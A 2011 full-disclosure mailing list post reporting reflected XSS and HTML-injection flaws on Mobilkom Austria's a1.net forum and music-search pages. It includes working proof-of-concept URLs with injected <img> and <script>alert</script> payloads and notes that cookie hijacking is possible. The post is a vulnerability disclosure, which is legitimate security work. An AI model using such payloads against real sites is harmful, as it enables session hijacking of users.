Date: Tue, 12 Jul 2011 12:39:21 +0200
From: bosti.be@...h.com
To: full-disclosure@...ts.grok.org.uk
Subject: Mobilkom Austria XSSes

G'Day Ladies and Gents,

It has already been over 3 weeks now since they told me they're 
going to fix these flaws as soon as they've resolved more important 
tasks... I think they had enough time, so here is my first 
disclosure.


Just a little, not that important non-persistent XSS. Cookie 
hijacking possible:

http://www.a1.net/forum/?module=mkaSearch&action=search&wo=-1&search_eforum=<img src=http://wtfhub.com/wp-content/uploads/2010/12/y-u-no-template1.jpg>

===========================

It gets funnier. They even DO allow HTML in a posting or thread. 

http://www.a1.net/forum/mkaPosts/insert/2207.page

Proof: http://i.imgur.com/0h5IM.jpg


===========================


As you can see in the Screenshot, they even allow HTML in your 
Signature. 

And yet another non-persistent XSS (search form), Cookie hijacking 
possible:

http://www.a1.net/musikfreizeichen/index.htm?action=browseSearchResult&exact=false&searchString=<script>alert("wat")</script>

===========================

some fun: http://i.imgur.com/1F141.png
and even more: http://i.imgur.com/GMqcm.png

First disclosure, keep that in mind. Now let's hope they fix the 
flaws soon. And btw, I also know they're not critical, so don't 
bitch about it.

Greets,
HypoX

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
